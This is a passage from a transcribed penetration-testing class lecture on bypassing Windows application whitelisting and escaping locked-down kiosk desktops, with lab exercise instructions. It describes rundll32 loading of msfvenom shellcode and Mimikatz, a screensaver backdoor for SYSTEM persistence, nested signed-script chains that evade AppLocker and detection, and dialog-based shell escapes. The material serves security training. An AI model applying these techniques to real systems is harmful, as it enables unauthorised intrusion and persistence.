tongue because I get excited about this. I want to show you something else, but I'll hold off on it. There's lots of things here. I'm just barely scratching the surface. I mean, we can really do anything we want. I could use another different kind of a payload as well. Like with this first unicorn example, I can get my meterpreter, but in the form of an HTA file where it really does HTA that runs VBScript that runs PowerShell, depending upon which payload I pick. I could do that. And maybe the HTA files aren't quite as restricted. I can download it and run it because it's allowed on this machine. People sometimes allow those. They're allowed by default. I've seen them used in printer driver installs and things. Somebody asked me once, isn't an HTA just only for attackers? I only see it when it's done in an attack. I never see it used in the real world. But there are HP and Dell printers I've run into that the installer actually uses HTAs. There's other reasons too. But those are the ones I tend to remember the most. Another one to keep in mind, run DLL32. I say here often allowed. I've never seen it properly blocked because you don't really have a normal Windows machine if you block it. You would have a Windows machine with no services. Like you wouldn't be able to log into it. Not even remotely. It just wouldn't even be able to log in if you didn't have run DLL32 allowed in some form. So here, if I do something like this MSF Venom that runs a command, I'm popping a calc, but save it to it, that command shellcode in a DLL form, and then I can use run DLL to load a DLL, and here we're calling it with a function that literally doesn't exist, the name. Because the way Meterpreter does this, it puts it in an onCreate remote thread function so that as soon as that thing is in memory, it gets activated, whatever's in that function, kind of like an auto-run situation. So we can run calculator that way, or we can run another thing, like our DLL version of Mimikatz. We can run an active shell in this. See, the idea is if we run this, it's not the DLL that's getting checked against the application whitelisting. It's the run DLL 32 EXE. And we can really confuse that. So we start thinking, all right, the more we use this, like antivirus signatures, the more they're going to catch on, right? But we can get real creative. Like here, I'm making a copy of CMDXE to a screensaver file name, which is also a portable executable. And here I'm running the desktop control panel applet and the install screensaver function, and I'm testing out the screensaver that really is a command shell. So the question is, what does this give you? If I can already type all this, I just get another shell, right? But maybe I couldn't. Maybe I had to actually do this inside of an application, and I didn't get a proper shell. So yes, I'm showing you on a command line to get a command line, but it's a lot easier to show you this way than the actual break in the application. Sometimes too, if I actually get this installed, what would happen if I actually got this installed? It's a logon.fcr is the default logon screensaver. Control alt delete to log in, that one. If I make CMD EXE replace that, I would have to be admin to do that. But forget about that for a moment. For backdoor reasons, it's a great way to do it. Screensaver kicks in, it runs my command shell. But what if we haven't logged in yet? Who owns the process? Well, if someone's logged in yet, its system that runs the process. So it turns out to be a pretty nice backdoor for those kinds of things. So it's not just about, you know, getting a command shell because you already had one, but it's also about persistence. You know, a screensaver backdoor is a favorite of mine. But let's take this up another notch. Here, I have command.exe running C script, running sync app vpublishserver.vbs. The script comes with all Windows 10 versions, I believe. I don't remember how old or how far back in the past it goes. But it does go all the way back. And what do you see happen here? We see some PowerShell commands. So this is a command injection of a Microsoft signed Visual Basic script that runs PowerShell. But it's signed by Microsoft. So even if you have enforced only running scripts signed by Microsoft, this will still run. We have command.exe running C script, running Visual Basic, running PowerShell. And what does PowerShell run? PowerShell runs run DLL32, and then it just doesn't run the DLL, but it has a shim DLL. Use shell 32's shell exec and run. That's basically double-clicking on a file. That's the same thing. CMD, verb run as. So verb run as with the start process and PowerShell. We'll talk a little bit more about PowerShell later, but not this. That just forces it to UAC to give you back your credentials if you're admin. That's what the verb run as does. So there's a lot of subtle things in this big long command. At first, though, when you look at it, you have to ask yourself, what's AppLocker going to check against? Is it the outside CMD? Is it the C script? Is it the Visual Basic? Is it the PowerShell? Is it the run DLL32, you know, that's there? Which one is it going to act on? And that's really the problem, is that most of the AppLocker checks are on the outside command. It might go a little bit deeper, but we can always go deeper, right? We can always nest in more commands to confuse AppLocker. It's turtles all the way down if you start going down that path, right? We can always make more layers. Another side effect here, notice this is blue. Does anybody want to tell me what blue UAC prompt means? Safe. If it's yellow, it's not signed by anybody you trust. If it's blue, it's probably okay because it's Microsoft. That's usually what it means. But because I'm using a Microsoft-signed VBS script, it's blue, not yellow. So I mean, this is just one of thousands of examples. Yes? Depending upon your logging, yes. If you have script block logging, this is definitely going to be logged. Command line logging, if you turn on general command line logging, you would get this big long command line. And if you're not already doing that as a defender, by the way, one of the best, easiest things you can do is just any line longer than like 80, like it's line wrapped, it's almost always going to be automation or evil. So if it's not something you made, it's evil. So long command lines are an easy detect. Of course, I could break this into smaller pieces, you know. Yeah. Chicken and egg. Yes, Ron. As far as an attacker, which would I find more dangerous for logging?
I'm asking as a defender.
As a defender goal, yes. But from my perspective, which one would I worry about as an attacker? I worry less about endpoint security products third party because they tend to get it wrong. The script block logging that Microsoft has built into its PowerShell version 5 stuff is pretty thorough. And although there have been ways to get around the logging, it's mainly using PowerShell to do that. So that initial thing that disables the logging still gets logged before it stops logging. And I have more faith, I guess, in this is Microsoft's command and management automation language, PowerShell, at them knowing what's going on more than a third party. So overall, philosophically, I'd say that. Yeah. Interesting question to ponder. Maybe over a break or a few adult beverages that might lead somewhere to good discussion. Yeah. Intriguing question. Thanks, Ron. Like I was saying, though, this could be many different combinations of things. This one happens to not really bypass UAC, it's literally asking, But maybe if I combine with a UAC bypass and a few other nested things, I can probably get around a lot of detections. And it might even be that I don't permanently get around it, but I just buy myself enough time because of some of your endpoint security products will take whatever this is and go try to run it in a sandbox and catch it. But you may have noticed as a pen tester, sometimes it takes 30 seconds or a minute for it to catch on that that's evil. And then it starts blocking it. Did I say blogging it? No, it's not writing articles. Blocking. I'm getting excited again. I need the right amount of caffeine. I need to be able to move my tongue fast and still articulate. All right. Anyway. So lots of awesome out there on this type of thing. You just have to find something you can abuse. Before we drop into the next exercise, though, I wanted to show you a couple of things. First, said it so many times already, but I can't stress enough, there are so many other things out there that are evil like that. Let's not look at my email, but let's look at, this is a fun one, Command via Paint. I just Googled Command via Paint, and like I said, you can do the file open, but wrong phrase apparently. Paint CMD. I think I have to do MS Paint. I'm trying to remember I'll recognize it when I see it. Oh, it's probably this link I already clicked on. It's purple. So, this is kind of a fun one that, again, doesn't really give you something you didn't already have, but it's a good exercise to think about alternatives. What this is doing, you can create a 6-pixel file with Paint that when you rename it and double click on it, it's a batch file that runs command.exe. How do we do this? Well, when you make a bitmap that uses RGB color, those are 3 bits for red, green, and blue each. And although those don't align to 8-bit bytes, we can still find the right amount of pixels and the right value of those pixels to rewrite the hex that represents the ASCII that would be a batch file in pixels. So that's what this technique does. You make an image that has those 6 pixels in it, and that's all you need. An image that's only 6 pixels wide that has these specific colors. You're literally painting a command shell that looks like that. Save it. Rename the file, and it does some metadata around it, but it's really just running CMD.exe when you run it. It's all that stuff's ignored, and it actually just runs CMD.exe. So we painted with 6 pixels a command shell. Now, if we can already run paint, save, and rename a file, we could probably already run a command shell. So the point really is just think about other things you have control over, and how can you manipulate those, right? So that was pretty funny. Tied together some things here. I've got Vista. It's fun to pick on Vista. But this is a VM that I hard-coded the IP address and then forgot what it was, and then it needed to activate. Now I can't go online to activate it, and even if I did, the automatic activation doesn't work the same because, it's Vista. It's old. So there's some really easy ways to escape this, but I'm going to just walk through a few things to kind of, again, exercise our minds. There's some easy ones, like activate Windows Online, maybe. Access your computer with reduced functionality allows you to buy a product key. It gives you a web browser so you can at least go buy a key. All right. That's going to be easy. Let's do something different, though, to make things a little more interesting. Don't forget, it's like a touch screen. Sometimes there's corners you can touch, and you really have no idea what the extra bonus things might be there. You have to experiment, and maybe you learn some from experience, but they're all custom. They're all different. I say that. I'm going to do F1. F1. There we go. And I just pulled up a help dialog. So I didn't even click on anything yet. What can I do from help? Well, sometimes it's as easy as, typing correctly. Command prompt, frequently asked questions. How do I get a command prompt? Click to open a command prompt. So sometimes you literally just have to ask, right? This wasn't even Google, and it was that easy. So of course, once I have this, I can do something with it. Let's do something different though. Don't overlook the easy things. What about clicking on the printer? I like to do printers because printers are, in kiosk situations, are often involved. So there's some functionality for printing usually. So, here I see some printers. That's actually a real one I have, that is VMware Tools is presenting to the VM. Let's do an add printer. Let's add a local printer. I really don't have much to work with here. So let's go back. Let's add a network printer. It's not going to find one. Let me hit stop. Not listed. Browse. Let's do browse. Browse sounds good. Now I have an Explorer dialog, but not full featured. Like I can try to look at my system. I'm going into Windows System 32. And I only see folders and, well, technically I only see folders and printers. Since there are no printers, I can't really see anything here. In some dialogs, you can actually get away with forcing it to do star dot star, but I got nothing. I got nothing. This is special to the printer dialog. I can't see anything. But, you know, I might be able to do something up here. Like if I try to enter that in, it actually ran it because it went to that shell open 32 just as if I double clicked on it. So I got one that way. And I know that's not the same one as the one I previously had because that's over here. So I still have those two. Just another way. So I've got that. Maybe this is being bad. I have to do a new folder. Kind of neat that, I got UAC. So UAC worked. So that's neat. Inside this process, I can now, if I were to get a command shell, maybe I am lucky enough. Let's see. I don't know. I haven't tried it. I do this differently every time. So let's see if this one works. Nope. Not an admin one still. I would have to do one inside the operation to get an administrator prompt. So I can't do that, but, you know, I can make a folder, right click and, explore. And now I get a proper Windows Explorer, not just one for printers. And you can see, that I actually do see things like CMD, EXE, whatever. Right click, run as administrator. Why not? You could. Or I just open it up, I get yet another one. And as I was saying before, the first Explorer process is actually your desktop. So by running Explorer, I get my desktop back. So there's lots of other things you can do. That's just one thing I like to show because it's all about exploring and it's kind of like a video game where you want to uncover as much territory as possible and what is there to abuse. All right. So it can be a lot of fun and addictive in a way. If I ever close this dialog though, by the way, the activation forces it to log off, but that's Vista. So not our point. The point was the techniques, some of those things to play with. So you've got an exercise for these exercises the rest of the day. You'll be, especially on the Windows 10 machine, Windows 10, here we are, you've got that lab shortcut on your desktop. Inside of there, the day 2 folder, there is a batch file for the exercise we're running. This first one is going to be the RDP one. You can look at this if you'd like and look at the PowerShell scripts it calls. We'll talk more about PowerShell coming up, but if you're learning a lot about PowerShell, I encourage you to look at this. It's outside of the scope of the exercise, but this does the things necessary to set you up for the exercise. So I'm just going to run it as the instructions of the book say. It says, press any key to continue, blah, blah, blah. And it does some things. It magically sets my machine, actually based on the IP addresses you've already set that Steve assigned yesterday. And after a short delay while it checks the certificate revocation list, I should get a remote desktop. It should drop me right into an application. And of course, because things take a long time, it's not happening, but you're going to do this for your exercise and you get dropped in. It's going to give you a username sort of based on your IP address. And your goal in this exercise, you see how I'm inside of remote desktop. I've got the tab at the top, but I don't have a start bar. Your goal is to get Notepad, Internet Explorer, open. Those two primary things. You can get Paint open if you want. It's a great alternative. And it doesn't have to be command.exe. You can get PowerShell open if you want. But that's your goal, is to go from Word to those things. Now, I have purposely done some really weird things to this. Some of it's just broken. Some of it's just secure. But that's the real world. How many, have you ever run into that situation where you had to fix something before you could exploit it? Especially after other people have like scanned something with SQL injection, they screw up the whole database. You know, maybe not a drop table one, but they've done other weird things. You've had to fix stuff before you can actually go exploit it. It happens sometimes. Anyway, have fun with this. Run the batch file. It'll drop you in. Make sure though, every time you run these exercises that have the batch file, make sure you enter through the whole thing and make sure that happens. It actually checks in with the server up here and checks to see if there's any things that might be fix-ups. There's none, but it's a good habit to run those scripts to completion, especially if I have to fix something later in the day. You'll need that. So let me know if you need any help, but this is a I'm not going to demonstrate this one because there are so many screenshots, and it's very visual. You'll be fine on that. Also, I'd like to say there's like a million different ways to do this, so don't feel like, oh, my book shows different than what I did, because somebody else might be do something that affects you as well. Like if they make a file in the temporary folder that you all see, it's going to be different. But have fun experimenting. We'll do about 15 minutes. We still have a lot of awesome content to get through today, and we won't sit around here too long. You will get more practice doing things like this, especially in the boot camp, and we'll also be using this. We'll put some you have an option to put an Empire agent in VBA form into this VM later, and you'll be able to use it as a target. So we still have more fun to be had. A couple things I will just kind of mention that you would have encountered. You can't use Task Manager. You can't right-click until you get a different Explorer coming up. The only royalty-free one I could find, Explorer Squared, was installed. That's that weird file browser. Kind of reminds you of the Dr. DOS days or Norton Commander or whatever those things were back in pre-Windows days. Reminds me of that anyway. Until you get that running, it has different rules. It doesn't observe all those desktop restrictions. But basically, the easiest way in, if you can follow the book, of course, but it's designed to show you trial and error on several things, the easiest way is definitely to just do one. I said many people do this. You've done it before. And I kind of saved it because I didn't want to give it away. If you didn't know that password, by the way, you could have looked at the script to see what it set up, or you can close it and open the batch file again. But if all I do is do a URL, like I do a file colon slash slash or a UNC path even, I don't even need to go an HTTP URL, but dots, like a backslash backslash C, Windows, or my host name, local host will probably work. Local, can't spell local. And I get a shortcut. Now, even if this thing doesn't work, if I click control and follow the link, it'll at least open up a browser even if it didn't work. If you don't remember C dollar signs, the hidden C share, or it might be disabled or whatever, it doesn't matter. The point is to get a link so it opens up something else. This one gave me an Explorer, but not an Internet Explorer. I still can't right-click. I can't show you what I can't do, but right-clicking there is not working. Right-clicking here is not working. And you have to try to get around. If I go to like Windows and go into a directory, I get that Explorer Squared dialog. And this one, indeed, doesn't follow the rules as far as the hardening. I can browse to System32 somewhere. There it is. And CMD, if I can type. There it is. But you double-click on that, and it actually gets a little bit confused because I did it over this path. This is kind of a funny thing. Like I said, I always do this differently. I've never done it this way before. But the backslash backslash local has C dollar sign Windows System 32 was still the current path when it tried to execute that file. So I got some weird side effects. I've been in situation as well. It's actually surprised it told me what happened. I'm putting you in that directory because I can't support network paths, where I destroy that it doesn't show me the right copyright because it's so confused when you open up the terminal. I've seen that a few times. Anyway, lots of fun can be had if you get to that point. And of course, if you do Explorer, you get your start button at the bottom. Eventually, there we go. And we can use that if we really want to. Of course, a lot of things are removed from that menu as well, but we can find the path, type it in the command shell prompt. We're probably in good shape. But that was the easiest way, is actually to create the link. It was kind of one of those things like, here's the hard way to do it in math, and here's the easy way. Use a calculator. Which, coincidentally, I love using the calculator, especially in those older XP and Server 2003 ones. If you right-click on the calculator bar on the taskbar, there's an open help URL link in the right-click context menu. So you can give it a URL to open, and it will open up a web browser from the calculator, which is awesome. Lots of fun to be had in those kinds of things. We'll move on. So as I was saying, there's easy ways to do those things. Sometimes they're easier than others. The point was to try to exercise some of your, broaden your horizons. What kinds of options were there? And even if we're not talking about a graphical situation, it's the same process, the same idea, I should say. You want to abuse what you are allowed, and that's how you escape those restrictions. And we'll revisit that in a general sense after we talk about some PowerShell things. Some screenshots if you follow that way. I also like to highlight this last bullet point we have here, that even if you've already seen it before, sometimes the way you got there is more important. Like, did you get there from a system shell or an administrator shell instead of a regular shell? The way you got there is more important than what it actually is. So don't be afraid to do things out of order sometimes, or reproduce your own steps. I've been in so many situations where I've had one of the guys I do pen testing with, his name's Christian, he will try something I literally just tried, and it didn't work for me, it works for him. Like, I'd say 20% of the time, I can't do something. I was like, I literally just tried that. Why did it work for you? He's got the magic touch. It just works. So sometimes you just have to try harder with apologies, offensive security folks. Generally, I like to try smarter, but sometimes it is just trying harder. It depends on timing. And I will say that with, like, endpoint security products, detecting your stuff, try harder actually is a pretty good idea. Because sometimes if you try harder and faster, you can get enough time to get something to work before it catches on.